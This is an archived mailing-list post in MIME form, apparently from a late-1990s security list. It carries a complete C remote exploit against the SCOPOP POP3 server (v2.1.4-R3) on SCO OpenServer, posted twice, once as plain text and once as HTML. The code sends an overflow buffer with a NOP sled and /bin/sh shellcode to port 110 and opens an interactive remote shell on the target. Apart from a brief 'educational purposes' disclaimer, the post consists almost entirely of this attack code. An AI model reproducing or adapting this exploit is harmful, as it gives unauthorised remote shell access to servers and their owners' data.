This is a multi-part message in MIME format.
------=_NextPart_000_00FF_01BDAFEE.186CC260
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
Hello.
Here is my ( ??:) ) exploit for SCOPOP server.=20
Offset 0 is for version 2.1.4-R3. =20
ASM string was little modified for SCO syscall style.
Tested on SCO Open Server 5.0.4.
FOR EDUCATIONAL PURPOSES ONLY.
------------------------CUT-------------------------
/*
* Remote pop exploit for SCO systems.
* by glitch of litecrew.
* Ripped from Miroslaw Grzybek's code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>=20
#include <netdb.h>
#include <sys/errno.h>
char *shell=3D
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define ADDR 0x80474b4
#define OFFSET 0
#define BUFLEN 1200
char buf[BUFLEN];
int offset=3DOFFSET;
int nbytes;
int sock;
struct sockaddr_in sa;
struct hostent *hp;
short a;
void main (int argc, char *argv[]) {
int i;
if(argc<2) {
printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
printf("Default offset is 0. It works against SCOPOP =
v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=3Datoi(argv[2]);
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=3D901;i<BUFLEN-4;i+=3D4)
*(int *)&buf[i]=3DADDR+offset;
buf[BUFLEN]=3D'\n';
if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) {
perror("gethostbyname()");
exit(0);
}
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=3DAF_INET;
sa.sin_port=3Dhtons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) {
perror("connect()");
exit(0);
}
printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); =
fflush(stdout);
write(sock,buf,strlen(buf));
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno=3D=3DEINTR) continue;
printf("CONNECTION CLOSED...\n"); =
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=3Dread(sock,buf,BUFLEN);
for(i=3D0;i<nbytes;i++) {
*(char *)&a=3Dbuf[i];
if ((a!=3D10)&&((a >126) || (a<32)) ){
buf[i]=3D' ';
}
}
write(1,buf,nbytes);
}
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));
}
}
-------------------------------CUT---------------------------------------=
------=_NextPart_000_00FF_01BDAFEE.186CC260
Content-Type: text/html;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<HTML>
<HEAD>
<META content=3Dtext/html;charset=3Dkoi8-r http-equiv=3DContent-Type>
<META content=3D'"MSHTML 4.72.3110.7"' name=3DGENERATOR>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT color=3D#000000 size=3D2>Hello.</FONT></DIV>
<DIV><FONT color=3D#000000 size=3D2> Here is my ( ??:) =
)=20
exploit for SCOPOP server. </FONT></DIV>
<DIV><FONT size=3D2>Offset 0 is for version 2.1.4-R3. =
</FONT></DIV>
<DIV><FONT size=3D2>ASM string was little modified for SCO syscall=20
style.</FONT></DIV>
<DIV><FONT size=3D2>Tested on SCO Open Server 5.0.4.</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>FOR EDUCATIONAL PURPOSES ONLY.</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT=20
size=3D2>------------------------CUT-------------------------</FONT></DIV=
>
<DIV><FONT =
size=3D2>/*<BR> * Remote=20
pop exploit for SCO=20
systems.<BR> * by glitch =
of=20
litecrew.<BR> * =
Ripped from=20
Miroslaw Grzybek's code.<BR> */</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>#include =20
<stdio.h><BR>#include =20
<stdlib.h><BR>#include =20
<sys/time.h><BR>#include =
<sys/types.h><BR>#include =
=20
<unistd.h><BR>#include =20
<sys/socket.h><BR>#include  =
;=20
<netinet/in.h> =
<BR>#include =20
<netdb.h><BR>#include =20
<sys/errno.h></FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>char=20
*shell=3D<BR>"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x=
17"<BR>"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7=
e"<BR>"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89=
"<BR>"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff&=
quot;<BR>"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb&qu=
ot;<BR>"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";</FONT></=
DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>#define ADDR 0x80474b4<BR>#define OFFSET =
0<BR>#define BUFLEN=20
1200</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D2>char =20
buf[BUFLEN];<BR>int =20
offset=3DOFFSET;<BR>int =20
nbytes;<BR>int sock;<BR>struct sockaddr_in =
sa;<BR>struct hostent *hp;<BR>short a;<BR>void main (int argc, =
char=20
*argv[]) {<BR> int=20
i;<BR> if(argc<2)=20
{<BR> &n=
bsp; =20
printf("Usage: %s <IP | HOSTNAME>=20
[offset]\n",argv[0]);<BR> &=
nbsp; =20
printf("Default offset is 0. It works against SCOPOP=20
v2.1.4-R3\n");<BR> &n=
bsp; =20
exit(0);<BR> =20
}<BR> =20
if(argc>2)<BR> &n=
bsp; =20
offset=3Datoi(argv[2]);<BR> =20
memset(buf,0x90,BUFLEN);<BR> =20
memcpy(buf+800,shell,strlen(shell));<BR> &nb=
sp; =20
for(i=3D901;i<BUFLEN-4;i+=3D4)<BR> =
=20
*(int =
*)&buf[i]=3DADDR+offset;<BR>  =
;=20
buf[BUFLEN]=3D'\n';<BR> =
if((hp=3D(struct=20
hostent *)gethostbyname(argv[1]))=3D=3DNULL)=20
{<BR> &n=
bsp; =20
perror("gethostbyname()");<BR> &nb=
sp; =20
exit(0);<BR> =20
}<BR> =20
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)=20
{<BR> &n=
bsp; =20
perror("socket()");<BR> &nbs=
p; =20
exit(0);<BR> =20
}<BR> =20
sa.sin_family=3DAF_INET;<BR> =20
sa.sin_port=3Dhtons(110);<BR> =20
memcpy((char *)&sa.sin_addr,(char=20
*)hp->h_addr,hp->h_length);<BR> =
=20
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0)=20
{<BR> &n=
bsp; =20
perror("connect()");<BR> &nb=
sp; =20
exit(0);<BR> =20
}<BR> printf("CONNECTED =
TO %s...=20
SENDING DATA\n",argv[1]);=20
fflush(stdout);<BR> =20
write(sock,buf,strlen(buf));<BR>  =
;=20
while(1)=20
{<BR> &n=
bsp; =20
fd_set input;</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT=20
size=3D2> &nbs=
p; =20
FD_SET(0,&input);<BR> =
=20
FD_SET(sock,&input);<BR> &nb=
sp; =20
if((select(sock+1,&input,NULL,NULL,NULL))<0)=20
{<BR> &n=
bsp; =20
if(errno=3D=3DEINTR)=20
continue;<BR> =
&=
nbsp;=20
printf("CONNECTION CLOSED...\n");=20
fflush(stdout);<BR> =
&=
nbsp; =20
exit(1);<BR> &=
nbsp; =20
}<BR> &n=
bsp; =20
if(FD_ISSET(sock,&input))=20
{<BR> &n=
bsp; =20
nbytes=3Dread(sock,buf,BUFLEN);<BR> &n=
bsp; &nb=
sp; =20
for(i=3D0;i<nbytes;i++)=20
{<BR> &n=
bsp; &nb=
sp; =20
*(char=20
*)&a=3Dbuf[i];<BR> &nb=
sp; &nbs=
p; =20
if ((a!=3D10)&&((a >126) || (a<32))=20
){<BR> &=
nbsp; &n=
bsp; =20
buf[i]=3D'=20
';<BR> &=
nbsp; &n=
bsp; =20
}<BR> &n=
bsp; &nb=
sp;=20
}<BR> &n=
bsp; =20
write(1,buf,nbytes);<BR> &=
nbsp; =20
}<BR> &n=
bsp; =20
if(FD_ISSET(0,&input))<BR> &=
nbsp; &n=
bsp; =20
write(sock,buf,read(0,buf,BUFLEN));<BR> &nbs=
p; =20
}<BR>}</FONT></DIV>
<DIV><FONT=20
size=3D2>-------------------------------CUT------------------------------=
---------<BR></FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV> </DIV></BODY></HTML>
------=_NextPart_000_00FF_01BDAFEE.186CC260--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:04:34 PDT